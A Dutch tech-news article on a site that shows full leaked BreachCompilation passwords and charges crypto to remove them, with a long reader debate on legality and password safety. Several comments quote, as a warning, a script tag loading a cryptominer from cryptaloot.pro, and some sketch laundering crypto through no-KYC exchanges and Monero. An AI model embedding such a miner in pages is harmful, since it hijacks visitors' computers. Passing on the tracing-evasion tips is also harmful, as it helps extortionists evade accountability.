Cookies op Tweakers

Tweakers maakt gebruik van cookies, onder andere om de website te analyseren, het gebruiksgemak te vergroten en advertenties te tonen. Door gebruik te maken van deze website, of door op 'Ga verder' te klikken, geef je toestemming voor het gebruik van cookies. Wil je meer informatie over cookies en hoe ze worden gebruikt, bekijk dan ons cookiebeleid.

Meer informatie

Ontwikkelaar vraagt geld voor verwijdering wachtwoorden uit zoekmachine

Een ontwikkelaar heeft een frontend gemaakt met de volledige wachtwoorden uit de BreachCompilation-database. Hij of zij vraagt gebruikers een storting van tien dollar in bitcoin, litecoin of ethereum om wachtwoorden van mensen uit de zoekmachine te verwijderen.

De website is sinds kort online, meldt RTL Nieuws naar aanleiding van een tip. De site laat gebruikers een e-mailadres invoeren, waarna het de wachtwoorden laat zien die naar voren kwamen in de BreachCompilation-database. De Nederlander d0gberry bouwde hier onlangs ook een frontend voor. In die database staan 1,4 miljard wachtwoorden, die verzameld zijn bij tientallen hacks van de afgelopen jaren.

De site toont in tegenstelling tot Gotcha.pw van d0gberry niet alleen de eerste karakters, maar de hele wachtwoorden. Bovendien vraagt de ontwikkelaar tien dollar in bitcoin, litecoin of ethereum om de wachtwoorden van die gebruiker van de site te laten verdwijnen.

Het is onbekend of er mensen zijn die de ontwikkelaar hebben betaald. De naam van de site is niet breed bekend, waardoor de kans klein lijkt dat veel internetters op de zoekmachine zijn gestuit. Het is niet de eerste zoekmachine voor de wachtwoorden uit BreachCompilation. In de afgelopen maanden hebben veel mensen zo'n site al gebouwd en online gezet. Sommige daarvan censureren de wachtwoorden, andere niet.

Screenshot van Gotcha.pw van d0gberry. Dat is niet de zoekmachine voor wachtwoorden waar dit artikel over gaat.

Door

Redacteur mobile

210 Linkedin Google+

Reacties (210)

Wijzig sortering
Dit lijkt mij gewoon afpersing en derhalve strafbaar. De inlogcredentials lijken mij ook niet rechtmatig verkregen. Direct aanpakken dit soort mensen!

[Reactie gewijzigd door Bor op 12 april 2018 13:41]

Waarom denk je dat hij/zij in Crypto betaald wil worden? Catch me if you can....
Het is niet helemaal waterdicht zoals jij wellicht denkt dat het is. Verdiep je daarom even in de materie. ;)
Is het niet gewoon een kwestie van crypto naar een louche (of gedecentraliseerde) exchange.. omzetten naar Monero. Terug naar een andere exchange, omzetten naar iets anders of dollars?

[Reactie gewijzigd door Fu-Raz op 12 april 2018 15:22]

Ik heb het ook niet exact in mijn netvlies zitten, maar weet wel dat voordat je gaat handelen, je eea eerst dient te bevestigen, alles wat daarna gebeurd is in elk geval moeilijk te volgen.

Om alles via omwegen eerst om te zetten naar monero (geen idee hoeveel transacties dat benodigd) en daarna weer terug brengt ook de nodige transactiekosten met zich mee, dus voordat je dan goed geld eruit hebt, zul je eerst moeten wachten tot de coins wat stijgen, wil je het een beetje interessant houden zonder al teveel verlies te maken.
Zijn niet veel transacties voor nodig hoor, daarnaast hebben veel exchanges geen KYC waardoor je geen gegevens hoeft te bevestigen. Transactiekosten en handelskosten zijn minimaal.
De grotere, zichzelf respecterende exchanges hebben dat wel, om te voldoen aan wetten en regels van o.a. de EU.
En is het niet veel makkelijker om gewoon je wachtwoord te wijzigen ipv hem $10 te gaan betalen?
Ja, want die $10 verwijdert alleen het wachtwoord uit zijn database, niet uit het originele gelekte bestand. En dan nog moet je maar hopen dat hij het daadwerkelijk verwijdert.
Ja, maar hij hoopt hier een aantal angstige computergebruikers (ouderen die weinig van internet afweten bv.) mee te vangen
Ja, want die weten ook hoe ze met bitcoins moeten betalen............

Commercieel geen succes denk ik voor deze knakker :P
Ik zeg dan ook bijvoorbeeld ;)
Dit is geen afpersing. Dit is informatie voorziening. indien je zo stom bent geweest om je wachtwoord niet op tijd te veranderen kan het natuurlijk voorkomen dat er hulpmiddelen komen om data in te zien die overal te downloaden is. Dat het niet netjes is, is een ander verhaal. Je bent in het verleden gewoon beetgenomen doordat de wachtwoorden onversleuteld zijn opgeslagen waardoor ze op straat liggen. Dat iemand hier geld mee wilt verdienen is hetzelfde als een marketier die jou iets wil aansmeren aan de telefoon, gewoon niet netjes. het maakt ook niet uit hoe men aan informatie komt (copyright schending waar je wachtwoord ook waarschijnlijk onder valt is hoogtens de boete die de rechter kan geven)
Het is nog steeds verspreiden van gestolen informatie. Dus lijkt mij ook nog steeds gewoon strafbaar.
Het moraal is inderdaad ver te zoeken bij deze website. An sich is het een vorm van heling. Het is overigens gewoon strafbaar inderdaad. De zoekterm daarvoor is 'Computercriminaliteit III'. ;)
Maar die is nog niet van kracht? Ligt al geruime tijd in de Eerste Kamer te wachten op antwoord.
https://www.eerstekamer.n...computercriminaliteit_iii

Verkopen van door misdrijf verkregen informatie is op dit moment in Nederland niet strafbaar, tenzij je er dingen bij doet waardoor het uitlokken of aanzetten tot een ander misdrijf doet ("hier, het wachtwoord van Engelfriet, saboteer snel z'n blog").
Geldt op dit moment het uitlokken of aanzetten tot een ander misdrijf niet? Het idee achter het aanbieden en opzoeken van clear text inlog credentials waarbij je ook credentials van andere kunt opzoeken lijkt mij evident. Hoe zit dat juridisch?
Ik vind het niet evident dat publicatie van een wachtwoord telt als uitlokken tot inbraak op het account, zeker niet als het account er niet meteen bij staat. De vraag is of je mensen aanzette tot iets anders dan ze dachten. Als jij of ik iemands wachtwoord op een site zien, denken we dan "oh dan ga ik even inloggen"?
Het lijkt mij een zeer bewuste keuze om de volledige wachtwoorden te publiceren en niet alleen de login of eerste paar karakters van het wachtwoord. Zeker als je ook nog een dienst aanbied om deze info tegen betaling te verwijderen.
De reden waarom mensen hier gebruik van zouden willen maken is puur om misbruik tegen te gaan. Als degene die de wachtwoorden publiceert dit zogenaamd niet voor ogen had, spreekt hij /zij zijn eigen business case tegen.
Ik zeg niet dat het een uitgemaakte zaak bij de rechter zal zijn, maar het lijkt me wel dat hier een strafbaar feit uit te halen is (misschien inderdaad niet evident). Echter ben jij de expert natuurlijk, dus hoor graag jouw zienswijze hierop ;-)

[Reactie gewijzigd door xSNAKEX op 12 april 2018 15:45]

Maar die is nog niet van kracht? Ligt al geruime tijd in de Eerste Kamer te wachten op antwoord.
https://www.eerstekamer.n...computercriminaliteit_iii
Let op dat in het artikel alleen staat "een ontwikkelaar", niet "een Nederlandse ontwikkelaar"; dikke kans dat die wet Łberhaupt niet van toepassing zou zijn
Ik vind het niet evident dat publicatie van een wachtwoord telt als uitlokken tot inbraak op het account, zeker niet als het account er niet meteen bij staat.
Maar het account staat er wel bij; je vult zelf in voor welk account je het wachtwoord op wilt zoeken.
Als jij of ik iemands wachtwoord op een site zien, denken we dan "oh dan ga ik even inloggen"?
Jij en ik niet, maar er zullen genoeg mensen zijn die dat wel doen. Of je mensen (in juridische zin) "aanzet" tot strafbare feiten durf ik niet te zeggen, maar gevoelsmatig komt dit voor mij overeen met een verhuurbedrijf dat breekijzers per uur aanbiedt en de hele nacht open is...
Oh, dat wist ik dan weer niet. Ik had eigenlijk stilletjes gehoopt dat iets wat al in 2010 een wetsvoorstel is geweest intussen wel van kracht zou zijn. Dank voor de informatie.
Niet strafbaar? Het is toch gewoon opzetheling (artikel 416 wvsr)? Of is informatie geen goed?
Dus als ik vandaag de database van een bekend forum kraak en alle wachtwoorden tesamen met 10GPU's kraak, dan is dat jouw schuld wou je zeggen?
Met hedendaagse technieken is het onmogelijk om het oorspronkelijke wachtwoord terug te toveren het is immers gehashed & salted. Daarbij hash je het vaker dan een keer (meestal 12 (de cost) op het moment bij standaard php password_hash functie) om in te loggen gebruik je dan de password_verify functie (deze kost tijd (hiervoor is de cost) indien je hele sterke wachtwoorden wilt om bijvoorbeeld tokens in op te slaan dien je de cost omhoog te doen. Indien de cpu kracht toeneemt moet je ook de cost omhoog doen. de cost staat op dit moment zo hoog dat het niet rendabel is om het terug te rekenen het cost immers te veel cpu kracht om het te kraken. Waar ik het over heb / had is dat ze vroeger een slechte implementatie hadden (bijvoorbeeld met een cost van 1) dan is ie zo gekraakt en erger nog zonder salt md5 hash bijvoorbeeld.

Waar jij wellicht geinteresseerd in bent is ISO27001 die ook eisen stelt aan een wachtwoord, waardoor bovenstaande mogelijk is binnen 400 ms inloggen e.d. hoe lang het duurt om dit terug te rekenen om te bruteforcen (dit kun je ook tegenhouden door een symetrische custom rekenmethode die je extra uitvoerd (immers de hacker moet de symetrische som goed oplossen. Als deze som al enkele velletjes papier bevat, van (+ / - * ) en dat zou ook allemaal met 2 en kunnen, dan is het nog steeds dagen zo niet weken / maanden werk om je custom rekenmethode op te lossen) Indien dat forum geen hedendaagse software gebruikt die alles goed geimplementeerd heeft. Daarnaast wie is geinteresseerd in jou als persoon, wellicht 1 a 2 personen via de hack. waar maak je je druk over...
Afpersing lijkt het niet te zijn, maar wellicht dat heling de juridische lading dekt.
Die website verkoopt geen gestolen e-mailadressen en bijhorende paswoorden. Men vraagt geld voor een verwijdering. Bij Ryanair noemen ze dat administratieve kosten.
En dan wordt het verwijderd uit de database van die website, die die persoon zelf heeft opgezet.

Een beetje een pistool op iemand's hoofd zetten en vervolgens "als je me 10 euro geeft, haal ik het pistool weg zonder te schieten".

Dit is gewoon afpersing, die persoon had de website ook gewoon niet op kunnen zetten. Het is ook niet zo dat de gegevens volledig van het internet verdwijnen (de gehackte gegevens zijn blijkbaar makkelijk te vinden voor dit soort types) en voor je het weet gaan alle klootzakken met een html cursus dit soort sites opzetten, blijf je dan betalen? Wanneer houdt het op?

Wie zegt dat deze eikel niet gewoon dezelfde website nog een keer opzet over een half jaar oid?
Je kan je wachtwoorden ook gewoon aanpassen. Dus in die zin is het wel een goede "hint".
Het kunnen aanbieden van deze database, en daar klaarblijkelijk veranderingen in denken te kunnen aanbrengen, lijkt toch te impliceren dat men het 'door misdrijf verkregen goed' voorhanden heeft en daar persoonlijk munt probeert uit te slaan. Dat is toch echt heling.
Wel mooi dat er in iedergeval geen link naar staat in dit artikel.
Maar voor de ontwikkelaar: dikke vinger. STuur die maar naar een eilandje in een verre staat waar ze het woord telefoon nog niet eens kennen.
Kijk naar het plaatje bij het artikel? Staat linkje onder...

http://gotcha.pw ... alstu
lezen is een kunst...
Screenshot van Gotcha.pw van d0gberry. Dat is niet de zoekmachine voor wachtwoorden waar dit artikel over gaat.
De tekst gaat niet over jouw linkje die als plaatje er onder wordt gebruikt.
Whoops inderdaad. Ik kwam tot de naam en direct opgehouden en naar de site gegaan :+
https://pwdquery.xyz/ is niet de site waar het over gaat, want ook deze site laat niet het hele wachtwoord zien.
Klopt, maar voor zover ik kan nagaan wel het juiste aantal karanters en dat doet https://gotcha.pw. niet....

En *knip* werkt niet.

[Reactie gewijzigd door Zeehond op 12 april 2018 15:23]

Werkt hier wel. Hij begon meteen te minen op mijn systeem. Niet eens proberen te verbergen, stonden gewoon 2 mining scripts onderaan.
Ik hoop dat je een grapje maakt.
Geen grap:

<script data-rocketsrc="//cryptaloot.pro/lib/crypta.js" type="text/rocketscript"></script>
idd, cpu direct naar 100% toe
Die site vindt het hier ook nuttig om 100% cpu te gebruiken...

edit: ah de mining scripts verklaren dat dus :|

[Reactie gewijzigd door zwolluf op 12 april 2018 14:58]

Even een waarschuwing, maar breachedpasswords is gewoon een cryptominer die volgens mij oneindig lang laadt:

<script data-rocketsrc="//cryptaloot.pro/lib/crypta.js" type="text/rocketscript"></script>
Mijn CPU ging naar 90%
Dat viel mij ook al op ja. :)

Die andere website werkt niet nee. De melding was eerst:
Checking 1.4 billion entries...
If this takes more than 20 seconds, try again later.
We will do the check while you are away.
Nu krijg je als melding:
Checking 1.4 billion entries...
It's a bit crowded... It seems that we've reached the news!
Please share to raise awareness. Too bad it takes a while now.
er wordt op jouw eerdere reactive met die link erin al gemeld dat het een cryptominer is...WAAROM post je em dan weer? |:( |:(
Maar pwdquery vindt al mijn mailadressen/wachtwoorden niet , terwijl gotcha dat wel doet voor sommige
Ik zal je helpen. Al je wachtwoorden zijn bekent.
Ga je ze nu aanpassen of moet ik eerst aan de haal gaan met je account.

Ps. dit is gratis advies.
Nogal naÔef. Al is het maar omdat je aan een e-mailadres en een wachtwoord niet genoeg hebt. Je hebt ook nog info nodig over de organisatie / website waar desbetreffende combinatie actief is.

Daarnaast zijn er denk ik maar weinig mensen die steeds hetzelfde wachtwoord gebruiken.

Een derde argument is dat kwaadwillenden er toch wel achter komen. En die wil ik voor zijn en dat kan ik niet als ik niet weet waar ik moet zijn cq welk wachtwoord van mij bekend is.

Edit: typo

[Reactie gewijzigd door knokki op 12 april 2018 14:08]

"
Daarnaast zijn er denk ik maar weinig mensen die steeds hetzelfde wachtwoord gebruiken.
Grappenmaker ;)
Ik weet niet of ik je reactie snap. Hoe dan ook wordt het je tegenwoordig vrijwel onmogelijk gemaakt steeds hetzelfde wachtwoord te gebruiken. Zo mag je vaak geen wachtwoord gebruiken dat je het afgelopen (half) jaar al hebt gebruikt; daarnaast is het aantal vereiste karakters de afgelopen jaren flink toegenomen, waarbij je eerst alleen een hoofdletter moest gebruiken, maar tegennwoodig vaak ook een cijfer en een leesteken. Hieruit volgt dat het niet erg waarschijnlijk is dat mensen steeds hetzelfde wachtwoord gebruiken. Tenzij het eerste ooit gebruikte wachtwoord aan alle hedendaagse eisen zou voldoen, maar dan heb je nog het 'houdbaarheidsargument'.

Edit: typo
gewoon overal het ww admin#01 :) werkt altijd en is zo voor de hand liggend dat ze er niet eens meer op zoeken }:O 8)7
en dan mag je geen # gebruiken in je wachtwoord 8)7
Goeie tip. Ga ik vanaf nu ook overal voor gebruiken! ;-)
je snapt hem niet.

"Hoe dan ook wordt het je tegenwoordig vrijwel onmogelijk gemaakt steeds hetzelfde wachtwoord te gebruiken. "

Bol.com weet niet dat ik hetzelfde wachtwoord ook voor Wehkamp gebruik.
oftewel, steeds hetzelfde wachtwoord gebruik.

Overigens wat jij zegt over dat het wachtwoord moeten wijzingen, en niet hetzelfde mag zijn als het afgelopen jaar, Dat vind ik enorm kwalijk. Het helpt niet met het de wachtwoordbeveiliging, meestal komt er dan gewoon '2017'/'2018' ofzo achter te staan. Dus helpt totaal niet!

En mijn oude wachtwoord wordt dus nog steeds opgeslagen!?!?! als ik wel 2 super verschillende wachtwoorden heb gebruikt, liggen er 2 wachtwoorden van mij op straat!
1) Er zijn juist heel veel mensen die op tig verschillende websites hetzelfde wachtwoord gebruiken. Dat is wat wordt bedoeld.

2) Waarom zou je niet gewoon een random wachtwoord gebruiken voor iedere site? Ga je een heel onzinverhaaltje schrijven over waarom jij voor webshops hetzelfde wachtwoord gebruikt wat nergens op slaat.
Daarnaast zijn er denk ik maar weinig mensen die steeds hetzelfde wachtwoord gebruiken.
Ik denk dat er maar weinig mensen zijn die het niet doen. Als ik naar mijzelf kijk, dan had ik voorheen een aantal wachtwoorden die hergebruikte. Een simpele, voor niet-boeiende sites, wat ingewikkelder tot hele complexe voor sites/applicaties die echt belangrijk zijn. Ik heb alles aangepast en gebruik nu alleen nog maar krankzinnige wachtwoorden m.b.v. een offline wachtwoord-manager waarvan ik de database zeer zwaar encrypted heb.
je kan iig met de bekende info inloggen op de email! en daarmee al genoeg kwaad doen!

maar het gaat hier meestal over account die al jaren geleden gelekt zijn....er staan maar weinig recente zaken tussen! (voor de mensen cq accounts die ik check iig!)

[Reactie gewijzigd door bArAbAtsbB op 12 april 2018 15:32]

Een derde argument is dat kwaadwillenden er toch wel achter komen. En die wil ik voor zijn en dat kan ik niet als ik niet weet waar ik moet zijn cq welk wachtwoord van mij bekend is.
Dan gebruik je toch de site van dogberry!? Het hele punt van dit artikel is niet dat je op kunt zoeken van welke accounts wachtwoorden uitgelekt zijn, maar dat deze specifieke ontwikkelaar de volledige wachtwoorden laat zien (dat zou je eventueel nog als "ontzettend dom" kunnen betitelen) en vooral dat ie geld vraagt om het te verwijderen (dat bewijst kwade opzet).
Als je nou eens leest wat er staat. Zie https://gotcha.pw. Als je daar bekend bent, dan weet je zeker dat je ook op bovengenoemde site te vinden bent.
Breachedpasswords is een cryptominer, kijk maar naar de broncode:

<script data-rocketsrc="//cryptaloot.pro/lib/crypta.js" type="text/rocketscript"></script>

Mijn CPU ging naar 90%
ik dacht dat adblockers zoals ublock dit tegen hielden, blijkbaar hier niet... iemand enig idee waarom?
ik dacht dat adblockers zoals ublock dit tegen hielden, blijkbaar hier niet... iemand enig idee waarom?
Adblockers blokkeren (specifieke resources op) specifieke sites. Dus net als met een virusscanner kunnen ze dingen pas tegenhouden zodra ze weten dat ze bestaan; ze werken met een blacklist. Wat wel zou moeten werken is om botweg alle scripts te blokkeren. Dat kun je doen door scripting uit te schakelen in je browser (maar dan werken de meeste websites niet meer) of met een scriptblocker (zoals NoScript) zodat je sites die je wel vertrouwt op de whitelist kunt zetten.
Ter info:
De website waar je naar verwijst bevat een cryptominer... Graag de link verwijderen..
Die laatste link kun je beter verwijderen, voor het geval dat die dadelijk wel weer werkt ;)
Gratis tip voor de volgende keer: eerst het artikel lezen, waarin nota bene een alternatief wordt vermeld op basis van dezelfde gegevens.

[Reactie gewijzigd door CH4OS op 12 april 2018 14:16]

Uhm, je snapt natuurlijk wel dat het censureren van de data niet alleen inhoud dat je alleen de karakters vervangt door sterretjes maar dat ze ook de lengte aanpassen toch? Dus de alternatieve sites gebruiken dezelfde gegevens (zelfde database met email/pw) maar censureren deze op hun eigen manier.
Dan moet je echt gaan leren lezen;
De Nederlander d0gberry bouwde hier onlangs ook een frontend voor. In die database staan 1,4 miljard wachtwoorden, die verzameld zijn bij tientallen hacks van de afgelopen jaren.

De site toont in tegenstelling tot Gotcha.pw van d0gberry niet alleen de eerste karakters, maar de hele wachtwoorden.
Los daarvan, is het ook niet per se nodig om het aantal karakters te tonen toch? Dat zou het te makkelijk maken voor derden. De informatie is voor alle sites, ook die jij linkt, exact hetzelfde, alleen gotcha.pw heeft een andere (logischere) censurering, boehoe.

[Reactie gewijzigd door CH4OS op 12 april 2018 15:25]

Zodat jij iemands anders wachtwoord op kan zoeken? Zelfs als ik die link had zou ik hem met niemand delen.

www.gotcha.pw geeft je de eerste twee karakters van jouw wachtwoord, daaruit zou je al kunnen halen of je wachtwoord gepowned is omdat die hetzelfde database gebruikt.
Zodat jij iemands anders wachtwoord op kan zoeken? Zelfs als ik die link had zou ik hem met niemand delen.

www.gotcha.pw geeft je de eerste twee karakters van jouw wachtwoord, daaruit zou je al kunnen halen of je wachtwoord gepowned is omdat die hetzelfde database gebruikt.
dat werkt zolang je wachtwoorden niet allemaal met de eerste 2 dezelfde karakters beginnen
dat werkt zolang je wachtwoorden niet allemaal met de eerste 2 dezelfde karakters beginnen
Als de eerste twee tekens hetzelfde zijn, dan zit het er dik in dat het valt in de categorie "password1", "password2", ... (of "password2018", "password2017", ...). In die situatie maakt het niet zo gek veel uit welke precies is uitgelekt; welke het ook is, je zult toch een nieuwe moeten bedenken. Ja, het zou eventueel nog "passwordgmail", "passwordhotmail", ... kunnen zijn, maar zelfs in dat geval lijkt mij de conclusie: tijd om een nieuwe te verzinnen.
haveibeenpwned.com

Daar zie je de wachtwoorden NIET. Dat is het hele punt. Als Tweakers hier de link gaat lopen delen waar je iemand anders zijn wachtwoorden kan vinden, dan maken ze zichzelf ook gewoon schuldig.
als je even gekeken had Gotcha.pw geeft slecht 2 karakters van het wachtwoord, zo kun je ze direct achterhalen....
Om ethische redenen wordt de website niet geplaatst. Dus je kan niet controleren of het nog een wachtwoord is wat je zelf gebruikt.
Je kan altijd naar gotcha.pw waar, volgens mij, de eerste 2 karakters zichtbaar zijn. Ik heb er ook een e-mail adres in staan (van jaren geleden) en ik herkende het wachtwoord wat er stond aan de eerste 2 karakters.
Ik ook. Herken het als een wachtwoord wat ik al pakweg 5+ jaar veranderd heb,


Waarom betalen om het uit de database te krijgen. Het word dan verwijderd uit ZIJN database. Niet uit alle anderen waar het in staat.
98,3% van het publiek snapt dat niet en is dus mogelijke doelgroep voor deze scam.
98,3% van het publiek snapt ook niet hoe je een betaling in cryptocurrencies kan doen.
98,3% van alle statistiek is uit de duim gezogen.
Waarom betalen? Ik kan alleen slechte redenen bedenken:
- Omdat je dat password nog steeds gebruikt en het niet kunt/wilt/mag wijzigen.
- Of omdat je de naam van je minnares als password hebt gebruikt en niet wilt dat je vrouw erachter komt.
- Of je wilt niet dat je baas erachter komt dat een database met hele gevoelige informatie waar jij verantwoordelijk voor bent indertijd achter een veel te simpel password zat.
Etc, etc.
ja, maar met betalen haal je je wachtwoord niet uit de bron.. De bron is het breachcompilation bestand. Dus anderen hebben nog steeds je wachtwoord. Het zou handig zijn als iemand wist waar ze vandaan kwamen zodat ik ze daar kan aanpassen (maar daar heb je dan weer have je been powned voor die dat netjes naar mij toe mailt)
Op zich is het wel handig om het hele wachtwoord te zien.. mijn wachtwoorden beginnen met reeksen waarvan ik gewoon domweg niet eens weet wat het wachtwoord zou kunnen zijn dat er in staat :P
Precies, je kunt beter zelf slim te werk gaan en door je eigen accounts te gaan en veranderen. Veel wachtwoordtools kunnen het (semi) automatisch. Wacht er niet mee tot je account-verzameling te groot wordt btw :P Ik was er zelf pas aardig wat tijd mee kwijt. Prima tip: accounts die je niet gebruikt gewoon wegflikkeren en niet laten rondhangen + het bijbehorende wachtwoord zeker niet recyclen in andere accounts. Nadeel is wel dat je dan gaat merken hoe beroerd het is gesteld met sommige websites en de opties (soms heb je zelf geen optie om te verwijderen en moet je support gaan mailen). Ik heb het er wel voor over, lekker opgeruimd ;)
Verdrietig dat zo'n site als http://plaintextoffenders.com/ nog steeds nieuwe content kan plaatsen. Je zou op een gegeven moment toch hopen dat ontwikkelaars wel doorhebben dat je wachtwoord niet plain-text moet opslaan (en doormailen).

[Reactie gewijzigd door cracking cloud op 12 april 2018 16:21]

Dat was ook mijn eerste idee.
Ik heb 1 emailadres waar ze een wachtwoord zichtbaar van hebben, echter is dit 100% zeker niet een wachtwoord dat ik ooit gebruikt heb bij dit adres. Hoe raar is dat.
Was het niet de het email addres welke u gebruikte als gebruikersnaam.
Om bij linkedin in te loggen?
Kan natuurlijk een wachtwoord zijn dat voor je is gegenereerd dat je nooit hebt aangepast. Misschien heb je de service nooit gebruikt, maar is deze gehackt en is dat het wachtwoord dat in de database staat?
Ik ook. Daarom wilde ik het wachtwoord op de andere site controleren.
Net gedaan en email van m'n moeder staat er in met wachtwoord, eerste 2 characters kloppen inderdaad, alleen zijn er 4 extra characters tov het wachtwoord wat ik herken... HIBP geeft aan "Exploit.In" breach.... maar ik ben dus toch benieuwd wat het hele wachtwoord is en waar dit dan vandaan komt..
Volgens de gotcha.pw:
This site only shows the first two characters, plus a random number of stars.
Dat verklaard de 4 'extra' karakters.
Dus hoogstwaarschijnlijk is dit wel het wachtwoord wat je verwacht.
Ah, dat verklaart dat, dan weet ik dus genoeg. Thanks.
Gotcha werkt allang niet meer helaas.

Herstel: Hij werktE niet laatst.

[Reactie gewijzigd door LNDN op 12 april 2018 19:36]

Het gebruikt dezelfde database als https://gotcha.pw. Deze toont enkel de eerste karakters.

Heb hier blijkbaar ťťn gelekt wachtwoord, maar gebruik die al jaren niet meer. Heb sowieso overal een ander wachtwoord icm Keychain tegenwoordig.
voor die check kan je de frontend van d0gberry gebruiken, de eerste twee karakters waren voor mij iig genoeg om te zien welk wachtwoord compromised is.
gebruik Gotcha.pw dan kan je een deel zien zodat je zelf weet of het ontdekt is en welk wachtwoord het is zodat je het kan veranderen op andere websites waar je het nu gebruikt.
…n je kan niet even nagaan of je nog kan aanmelden met de gegevens van een kennis ;)

Het gaat om data die al lang geleden gelekt is. Als het goed is heb je sindsdien je wachtwoorden al (meer dan eens) veranderd.
Als je twijfelt, kan je terecht op gotcha of haveibeenpwned, of, nog beter, gewoon preventief je accounts van een vers, sterk en uniek wachtwoord voorzien.

Je argument gaat dus niet op. Er zijn maar heel weinig goede (ethisch correcte) redenen om te neuzen in dat soort gegevens.

[Reactie gewijzigd door the_stickie op 12 april 2018 14:25]

Bij gotcha.pw kan je het eenvoudig verwijderen via https://gotcha.pw/remove
Helaas wordt je alleen niet weergegeven in de resultaten van gotcha.pw. Het emailadres blijft gewoon in de database staan...
Bedoel je in de database van die gotcha.pw website of de database van usernames en paswoorden die overal downloadbaar is? Op twitter lees je nochtans dat de maker van gotcha.pw reageert op verzoeken waarop hij antwoordt dat de emailadressen uit zijn bronbestand zijn verwijderd: https://twitter.com/Dailybits/status/982136417751986176
Dat is niet 'zijn' bronbestand, ik bedoel, die bestanden zwerven al lang over het internet en die gast van gotcha.pw kan echt niet bij alle kopieŽn - althans, minimaal niet bij de kopie die ik hier op m'n HD heb staan :z
minimaal niet bij de kopie die ik hier heb staan
Kan ik nu bij jou ook een verzoek indienen met verwijzing naar de GDPR met het recht om vergeten te worden?
[...]


Kan ik nu bij jou ook een verzoek indienen met verwijzing naar de GDPR met het recht om vergeten te worden?
Helaas werkt dit alleen voor bedrijven zo, niet voor consumenten ;)

[Reactie gewijzigd door chickpoint op 12 april 2018 15:37]

Fout! Iedereen, zowel natuurlijke als rechtspersonen, moeten GDPR compliant omgaan met gegevens.
Dus je moet dus zeker wel op dat verzoek in gaan ;)
Ik hoop dat je door hebt dat je het bezit zijn van materiaal dat via computervredebreuk verkregen is een strafbaar feit is.
Geen idee waar die combo's vandaan zijn gekomen, voor hetzelfde geld zijn ze gepost door een medewerker van een webshop of wat dan ook. Ik ben gewoon niet bereid om mijn gegevens in te vullen in 1 of andere door een anonieme pseudohacker neergezette database html frontend maar was net als iedereen natuurlijk toch ook benieuwd of mijn wachtwoorden erin te vinden waren en zo ja welke precies, dus besloot ik zelf even snel het pakketje te downloaden en dat lokaal te doorzoeken; een stuk veiliger.

Ik wilde alleen maar even illustreren: die combos zwerven al heel erg lang op het internet en er zijn ongetwijfeld honderdduizenden nieuwsgierigen die ze een keer gedownload hebben dus verwijderen is inmiddels onmogelijk, iedereen zal gewoon zijn wachtwoorden moeten aanpassen om weer terug te kunnen keren in de oude illusie van veiligheid.

Mijn kopietje is intussen trouwens alweer gedelete hoor, hopelijk voel je je nu weer veilig ;)

[Reactie gewijzigd door droner op 12 april 2018 15:27]

Het merendeel van die (al dan niet gecombineerde) datasets zijn verkregen uit een van de vele grote (of kleinere) inbreuken bij bedrijven of instellingen, waarna ze op een een of andere manier na een tijdje beschikbaar te zijn geweest via de in het algemeen minder bekende koopkanalen ze uiteindelijk vrijelijk online verschijnen. Ze zullen nooit verdwijnen, want zo werkt het internet.
Dit doet echter niets af aan de oorsprong van de data.

Ik snap prima dat je nogal shady sites niet vertrouwt (doe ik ook niet) en je het als nog wilt controleren, maar dat betekent niet dat je nonchalant hoeft te verkondigen dat die dataset op je hd staat, er zijn redenen voor dat dit strafbaar is, o.a. om mensen er van te weerhouden. Of dat moet, het werkt en of dat ooit consequenties heeft voor de gemiddelde persoon zal ik even daar laten omdat dat een andere discussie is.

Als je het bij 'ik heb de set gedownload en gecontroleerd en daarna gedelete want ik vertrouw de site niet' had niemand hier iets raars van gemaakt en had je wellicht zelfs meestand gehad.

En inhoudelijk:
... voor hetzelfde geld zijn ze gepost door een medewerker van een webshop of wat dan ook. ...
Dit is net zo strafbaar, ook uit vervreemde bron en bevat gegevens die dus ook niet vrijelijk beschibaar hadden moeten zijn.
Ik ben gewoon niet bereid om mijn gegevens in te vullen in 1 of andere door een anonieme pseudohacker neergezette database html frontend maar was net als iedereen natuurlijk toch ook benieuwd of mijn wachtwoorden erin te vinden waren en zo ja welke precies, dus besloot ik zelf even snel het pakketje te downloaden en dat lokaal te doorzoeken; een stuk veiliger.
Dat gedeelte was inderdaad waar iedereen het waarschijnlijk , en in ieder geval ik, mee eens is.
Mijn kopietje is intussen trouwens alweer gedelete hoor, hopelijk voel je je nu weer veilig ;)
Ik vertrouw jou net zo weinig als die 'shady sites' :+
Dat die data op die manier vrijgekomen is is ook maar jouw aanname; zeer reŽel, dat zeker, maar het blijft een aanname.

Ik ben niet zo bang voor dat soort wetgeving, als ik zelf totaal geen kwade bedoelingen heb en die data ook niet verder verspreid dan is er m.i. bijzonder weinig aan de hand, die wetgeving is m.i. ook helemaal niet bedoeld voor dat soort situaties maar om misbruik te voorkomen. Mijn download uit een derde hand stimuleert helemaal niemand om extra hacks te plegen, op geen enkele manier- als die data dus al uit hacks verkregen is, wat me lastig te bewijzen lijkt.

Ik vind ook helemaal niet dat mensen afgestraft moeten worden voor het doen van posts waar 'mogelijk strafbaar' gedrag uit zou kunnen blijken, maar ja ik ben dan ook van de oudere generatie internetters die nog gelooft in het delen van informatie en het vrijuit op onderzoek gaan, blijkbaar vinden sommigen dat inmiddels doodeng en willen ze dat liever helemaal niet horen. Ik snap dat niet zo.

Tot slot kan een lezer ook gewoon uitgaan van goede bedoelingen van een poster ook al wordt dat niet letterlijk erbij vermeld in de post, ik vind niet dat posters bij voorbaat maar uit moeten gaan van andermans achterdocht en daar dan op in moeten spelen.
Daar schiet je alleen niet zoveel mee op. Het wachtwoord zal nog steeds in de bron-data zitten, daar heeft gotcha.pw geen invloed op. Daarnaast laat gotcha.pw alleen de eerste 2 karakters zien, gevolgd door een willekeurig aantal sterretjes. Dus als iemand jouw email-adres invult om jouw wachtwoorden te achterhalen, dan krijgt deze bijzonder weinig informatie (met een degelijk wachtwoord hoort het niet mogelijk te zijn om als je de eerste 2 karakters kent, de rest eenvoudig te raden).
..die wachtwoorden slingeren toch al tijden op het web, al jaren bekend in de hack scene (en ver daarbuiten)
Ik denk dat er wel degelijk een verschil is tussen wachtwoorden in een hacking scene of uit een zoekmachine. Om aan wachtwoorden te geraken binnen een hacking scene moet je al iets of wat info hebben hoe je aan de wachtwoorden geraakt. Op welke website haal je die, en je moet vaak nog een paar stappen door alvorens je de wachtwoorden kan gebruiken, voor velen al te veel werk.

